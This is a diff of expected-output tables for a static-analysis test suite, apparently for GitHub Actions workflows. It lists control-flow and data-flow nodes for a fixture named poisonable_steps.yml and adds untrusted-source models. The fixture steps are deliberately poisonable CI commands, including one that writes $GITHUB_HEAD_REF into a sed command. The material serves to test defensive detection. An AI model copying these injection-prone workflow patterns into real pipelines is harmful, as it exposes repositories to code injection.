.github/workflows/poisonable_steps.yml:22:14:22:40 | python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | -| .github/workflows/poisonable_steps.yml:22:14:22:40 | python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:22:14:22:40 | python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | +| .github/workflows/poisonable_steps.yml:22:14:22:40 | python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | | .github/workflows/poisonable_steps.yml:22:14:22:40 | python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | -| .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:23:14:23:50 | echo foo; python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | -| .github/workflows/poisonable_steps.yml:23:14:23:50 | echo foo; python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:23:14:23:50 | echo foo; python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | +| .github/workflows/poisonable_steps.yml:23:14:23:50 | echo foo; python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | | .github/workflows/poisonable_steps.yml:23:14:23:50 | echo foo; python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | -| .github/workflows/poisonable_steps.yml:24:9:25:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:24:14:24:29 | pnpm run test:ct | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | -| .github/workflows/poisonable_steps.yml:24:14:24:29 | pnpm run test:ct | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:24:9:25:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:24:14:24:29 | pnpm run test:ct | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | +| .github/workflows/poisonable_steps.yml:24:14:24:29 | pnpm run test:ct | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | | .github/workflows/poisonable_steps.yml:24:14:24:29 | pnpm run test:ct | .github/workflows/poisonable_steps.yml:24:9:25:6 | Run Step | -| .github/workflows/poisonable_steps.yml:25:9:26:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:25:14:25:73 | pip install nbformat && python scripts/generate_notebooks.py | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | -| .github/workflows/poisonable_steps.yml:25:14:25:73 | pip install nbformat && python scripts/generate_notebooks.py | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:25:9:26:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:25:14:25:73 | pip install nbformat && python scripts/generate_notebooks.py | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | +| .github/workflows/poisonable_steps.yml:25:14:25:73 | pip install nbformat && python scripts/generate_notebooks.py | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | | .github/workflows/poisonable_steps.yml:25:14:25:73 | pip install nbformat && python scripts/generate_notebooks.py | .github/workflows/poisonable_steps.yml:25:9:26:6 | Run Step | -| .github/workflows/poisonable_steps.yml:26:9:27:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:26:14:26:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | -| .github/workflows/poisonable_steps.yml:26:14:26:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:26:9:27:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:26:14:26:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | +| .github/workflows/poisonable_steps.yml:26:14:26:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | | .github/workflows/poisonable_steps.yml:26:14:26:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:26:9:27:6 | Run Step | -| .github/workflows/poisonable_steps.yml:27:9:28:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:27:14:27:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | -| .github/workflows/poisonable_steps.yml:27:14:27:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:27:9:28:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:27:14:27:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | +| .github/workflows/poisonable_steps.yml:27:14:27:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | | .github/workflows/poisonable_steps.yml:27:14:27:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:27:9:28:6 | Run Step | -| .github/workflows/poisonable_steps.yml:28:9:29:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:28:14:28:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | -| .github/workflows/poisonable_steps.yml:28:14:28:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:28:9:29:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:28:14:28:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | +| .github/workflows/poisonable_steps.yml:28:14:28:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | | .github/workflows/poisonable_steps.yml:28:14:28:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:28:9:29:6 | Run Step | -| .github/workflows/poisonable_steps.yml:29:9:30:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:29:14:29:42 | xvfb-run ./mvnw clean package | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | -| .github/workflows/poisonable_steps.yml:29:14:29:42 | xvfb-run ./mvnw clean package | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:29:9:30:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:29:14:29:42 | xvfb-run ./mvnw clean package | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | +| .github/workflows/poisonable_steps.yml:29:14:29:42 | xvfb-run ./mvnw clean package | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | | .github/workflows/poisonable_steps.yml:29:14:29:42 | xvfb-run ./mvnw clean package | .github/workflows/poisonable_steps.yml:29:9:30:6 | Run Step | -| .github/workflows/poisonable_steps.yml:30:9:31:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:30:14:30:46 | echo "foo" && npm i && echo "bar" | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | -| .github/workflows/poisonable_steps.yml:30:14:30:46 | echo "foo" && npm i && echo "bar" | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:30:9:31:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:30:14:30:46 | echo "foo" && npm i && echo "bar" | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | +| .github/workflows/poisonable_steps.yml:30:14:30:46 | echo "foo" && npm i && echo "bar" | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | | .github/workflows/poisonable_steps.yml:30:14:30:46 | echo "foo" && npm i && echo "bar" | .github/workflows/poisonable_steps.yml:30:9:31:6 | Run Step | -| .github/workflows/poisonable_steps.yml:31:9:32:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:31:14:31:44 | echo "foo" \| npm i \| echo "bar" | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | -| .github/workflows/poisonable_steps.yml:31:14:31:44 | echo "foo" \| npm i \| echo "bar" | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:31:9:32:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:31:14:31:44 | echo "foo" \| npm i \| echo "bar" | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | +| .github/workflows/poisonable_steps.yml:31:14:31:44 | echo "foo" \| npm i \| echo "bar" | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | | .github/workflows/poisonable_steps.yml:31:14:31:44 | echo "foo" \| npm i \| echo "bar" | .github/workflows/poisonable_steps.yml:31:9:32:6 | Run Step | -| .github/workflows/poisonable_steps.yml:32:9:33:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:32:14:32:44 | echo "foo" \| npm i \| echo "bar" | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | -| .github/workflows/poisonable_steps.yml:32:14:32:44 | echo "foo" \| npm i \| echo "bar" | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:32:9:33:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:32:14:32:44 | echo "foo" \| npm i \| echo "bar" | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | +| .github/workflows/poisonable_steps.yml:32:14:32:44 | echo "foo" \| npm i \| echo "bar" | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | | .github/workflows/poisonable_steps.yml:32:14:32:44 | echo "foo" \| npm i \| echo "bar" | .github/workflows/poisonable_steps.yml:32:9:33:6 | Run Step | -| .github/workflows/poisonable_steps.yml:33:9:34:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:33:14:33:35 | echo "foo `npm i` bar" | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | -| .github/workflows/poisonable_steps.yml:33:14:33:35 | echo "foo `npm i` bar" | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:33:9:34:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:33:14:33:35 | echo "foo `npm i` bar" | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | +| .github/workflows/poisonable_steps.yml:33:14:33:35 | echo "foo `npm i` bar" | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | | .github/workflows/poisonable_steps.yml:33:14:33:35 | echo "foo `npm i` bar" | .github/workflows/poisonable_steps.yml:33:9:34:6 | Run Step | -| .github/workflows/poisonable_steps.yml:34:9:35:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:34:14:34:52 | dotnet test foo/Tests.csproj -c Release | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | -| .github/workflows/poisonable_steps.yml:34:14:34:52 | dotnet test foo/Tests.csproj -c Release | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:34:9:35:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:34:14:34:52 | dotnet test foo/Tests.csproj -c Release | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | +| .github/workflows/poisonable_steps.yml:34:14:34:52 | dotnet test foo/Tests.csproj -c Release | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | | .github/workflows/poisonable_steps.yml:34:14:34:52 | dotnet test foo/Tests.csproj -c Release | .github/workflows/poisonable_steps.yml:34:9:35:6 | Run Step | -| .github/workflows/poisonable_steps.yml:35:9:36:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:35:14:35:26 | go run foo.go | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | -| .github/workflows/poisonable_steps.yml:35:14:35:26 | go run foo.go | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:35:9:36:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:35:14:35:26 | go run foo.go | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | +| .github/workflows/poisonable_steps.yml:35:14:35:26 | go run foo.go | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | | .github/workflows/poisonable_steps.yml:35:14:35:26 | go run foo.go | .github/workflows/poisonable_steps.yml:35:9:36:6 | Run Step | -| .github/workflows/poisonable_steps.yml:36:9:37:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:36:14:36:86 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | -| .github/workflows/poisonable_steps.yml:36:14:36:86 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:36:9:37:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:36:14:36:86 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | +| .github/workflows/poisonable_steps.yml:36:14:36:86 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | | .github/workflows/poisonable_steps.yml:36:14:36:86 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json | .github/workflows/poisonable_steps.yml:36:9:37:6 | Run Step | -| .github/workflows/poisonable_steps.yml:37:9:38:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:37:14:37:51 | sed -f ./config.sed file.txt > foo.txt | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | -| .github/workflows/poisonable_steps.yml:37:14:37:51 | sed -f ./config.sed file.txt > foo.txt | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:37:9:38:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:37:14:37:51 | sed -f ./config.sed file.txt > foo.txt | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | +| .github/workflows/poisonable_steps.yml:37:14:37:51 | sed -f ./config.sed file.txt > foo.txt | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | | .github/workflows/poisonable_steps.yml:37:14:37:51 | sed -f ./config.sed file.txt > foo.txt | .github/workflows/poisonable_steps.yml:37:9:38:6 | Run Step | -| .github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:38:14:38:45 | sed -f config file.txt > foo.txt | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | -| .github/workflows/poisonable_steps.yml:38:14:38:45 | sed -f config file.txt > foo.txt | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:38:14:38:45 | sed -f config file.txt > foo.txt | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | +| .github/workflows/poisonable_steps.yml:38:14:38:45 | sed -f config file.txt > foo.txt | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | | .github/workflows/poisonable_steps.yml:38:14:38:45 | sed -f config file.txt > foo.txt | .github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | -| .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:39:14:39:55 | echo "foo" \| awk -f ./config.awk > foo.txt | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | -| .github/workflows/poisonable_steps.yml:39:14:39:55 | echo "foo" \| awk -f ./config.awk > foo.txt | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:39:14:39:55 | echo "foo" \| awk -f ./config.awk > foo.txt | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | +| .github/workflows/poisonable_steps.yml:39:14:39:55 | echo "foo" \| awk -f ./config.awk > foo.txt | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | | .github/workflows/poisonable_steps.yml:39:14:39:55 | echo "foo" \| awk -f ./config.awk > foo.txt | .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | -| .github/workflows/poisonable_steps.yml:40:9:40:74 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | -| .github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | .github/workflows/poisonable_steps.yml:40:9:40:74 | Run Step | +| .github/workflows/poisonable_steps.yml:40:9:41:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | +| .github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | .github/workflows/poisonable_steps.yml:40:9:41:6 | Run Step | +| .github/workflows/poisonable_steps.yml:41:9:41:23 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:41:14:41:22 | ./foo/cmd | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | +| .github/workflows/poisonable_steps.yml:41:14:41:22 | ./foo/cmd | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:41:14:41:22 | ./foo/cmd | .github/workflows/poisonable_steps.yml:41:9:41:23 | Run Step | | .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:1:40:53 | on: push | | .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:1:40:53 | on: push | | .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:5:1:8 | push | @@ -665,11 +672,11 @@ cfgNodes | .github/workflows/multiline.yml:79:14:84:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | | .github/workflows/multiline.yml:85:9:89:29 | Run Step | | .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | -| .github/workflows/poisonable_steps.yml:1:1:40:74 | enter on: push | -| .github/workflows/poisonable_steps.yml:1:1:40:74 | exit on: push | -| .github/workflows/poisonable_steps.yml:1:1:40:74 | exit on: push (normal) | -| .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | -| .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:1:1:41:23 | enter on: push | +| .github/workflows/poisonable_steps.yml:1:1:41:23 | exit on: push | +| .github/workflows/poisonable_steps.yml:1:1:41:23 | exit on: push (normal) | +| .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | +| .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | | .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | | .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | | .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | @@ -728,8 +735,10 @@ cfgNodes | .github/workflows/poisonable_steps.yml:38:14:38:45 | sed -f config file.txt > foo.txt | | .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | | .github/workflows/poisonable_steps.yml:39:14:39:55 | echo "foo" \| awk -f ./config.awk > foo.txt | -| .github/workflows/poisonable_steps.yml:40:9:40:74 | Run Step | +| .github/workflows/poisonable_steps.yml:40:9:41:6 | Run Step | | .github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | +| .github/workflows/poisonable_steps.yml:41:9:41:23 | Run Step | +| .github/workflows/poisonable_steps.yml:41:14:41:22 | ./foo/cmd | | .github/workflows/test.yml:1:1:40:53 | enter on: push | | .github/workflows/test.yml:1:1:40:53 | exit on: push | | .github/workflows/test.yml:1:1:40:53 | exit on: push (normal) | @@ -808,7 +817,7 @@ dfNodes | .github/workflows/multiline.yml:79:14:84:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | | .github/workflows/multiline.yml:85:9:89:29 | Run Step | | .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | -| .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | | .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | | .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | | .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | @@ -867,8 +876,10 @@ dfNodes | .github/workflows/poisonable_steps.yml:38:14:38:45 | sed -f config file.txt > foo.txt | | .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | | .github/workflows/poisonable_steps.yml:39:14:39:55 | echo "foo" \| awk -f ./config.awk > foo.txt | -| .github/workflows/poisonable_steps.yml:40:9:40:74 | Run Step | +| .github/workflows/poisonable_steps.yml:40:9:41:6 | Run Step | | .github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | +| .github/workflows/poisonable_steps.yml:41:9:41:23 | Run Step | +| .github/workflows/poisonable_steps.yml:41:14:41:22 | ./foo/cmd | | .github/workflows/test.yml:5:5:31:2 | Job: job1 | | .github/workflows/test.yml:8:7:10:4 | Job outputs node | | .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | @@ -949,7 +960,7 @@ nodeLocations | .github/workflows/multiline.yml:79:14:84:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:79:14:84:29 | .github/workflows/multiline.yml@79:14:84:29 | | .github/workflows/multiline.yml:85:9:89:29 | Run Step | .github/workflows/multiline.yml:85:9:89:29 | .github/workflows/multiline.yml@85:9:89:29 | | .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:86:14:89:29 | .github/workflows/multiline.yml@86:14:89:29 | -| .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | .github/workflows/poisonable_steps.yml:5:5:40:74 | .github/workflows/poisonable_steps.yml@5:5:40:74 | +| .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | .github/workflows/poisonable_steps.yml:5:5:41:23 | .github/workflows/poisonable_steps.yml@5:5:41:23 | | .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | .github/workflows/poisonable_steps.yml:7:9:8:6 | .github/workflows/poisonable_steps.yml@7:9:8:6 | | .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | .github/workflows/poisonable_steps.yml:7:14:7:30 | .github/workflows/poisonable_steps.yml@7:14:7:30 | | .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | .github/workflows/poisonable_steps.yml:8:9:13:6 | .github/workflows/poisonable_steps.yml@8:9:13:6 | @@ -1008,8 +1019,10 @@ nodeLocations | .github/workflows/poisonable_steps.yml:38:14:38:45 | sed -f config file.txt > foo.txt | .github/workflows/poisonable_steps.yml:38:14:38:45 | .github/workflows/poisonable_steps.yml@38:14:38:45 | | .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | .github/workflows/poisonable_steps.yml:39:9:40:6 | .github/workflows/poisonable_steps.yml@39:9:40:6 | | .github/workflows/poisonable_steps.yml:39:14:39:55 | echo "foo" \| awk -f ./config.awk > foo.txt | .github/workflows/poisonable_steps.yml:39:14:39:55 | .github/workflows/poisonable_steps.yml@39:14:39:55 | -| .github/workflows/poisonable_steps.yml:40:9:40:74 | Run Step | .github/workflows/poisonable_steps.yml:40:9:40:74 | .github/workflows/poisonable_steps.yml@40:9:40:74 | +| .github/workflows/poisonable_steps.yml:40:9:41:6 | Run Step | .github/workflows/poisonable_steps.yml:40:9:41:6 | .github/workflows/poisonable_steps.yml@40:9:41:6 | | .github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | .github/workflows/poisonable_steps.yml:40:14:40:73 | .github/workflows/poisonable_steps.yml@40:14:40:73 | +| .github/workflows/poisonable_steps.yml:41:9:41:23 | Run Step | .github/workflows/poisonable_steps.yml:41:9:41:23 | .github/workflows/poisonable_steps.yml@41:9:41:23 | +| .github/workflows/poisonable_steps.yml:41:14:41:22 | ./foo/cmd | .github/workflows/poisonable_steps.yml:41:14:41:22 | .github/workflows/poisonable_steps.yml@41:14:41:22 | | .github/workflows/test.yml:5:5:31:2 | Job: job1 | .github/workflows/test.yml:5:5:31:2 | .github/workflows/test.yml@5:5:31:2 | | .github/workflows/test.yml:8:7:10:4 | Job outputs node | .github/workflows/test.yml:8:7:10:4 | .github/workflows/test.yml@8:7:10:4 | | .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | .github/workflows/test.yml:8:20:8:50 | .github/workflows/test.yml@8:20:8:50 | @@ -1030,7 +1043,7 @@ nodeLocations scopes | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | | .github/workflows/multiline.yml:1:1:89:29 | on: | -| .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | +| .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | | .github/workflows/test.yml:1:1:40:53 | on: push | sources | ahmadnassri/action-changed-files | * | output.files | filename | manual | @@ -1052,6 +1065,10 @@ sources | jitterbit/get-changed-files | * | output.removed | filename | manual | | jitterbit/get-changed-files | * | output.renamed | filename | manual | | khan/pull-request-comment-trigger | * | output.comment_body | text | manual | +| lots0logs/gh-action-get-changed-files | * | output.added | PR changed files | manual | +| lots0logs/gh-action-get-changed-files | * | output.all | PR changed files | manual | +| lots0logs/gh-action-get-changed-files | * | 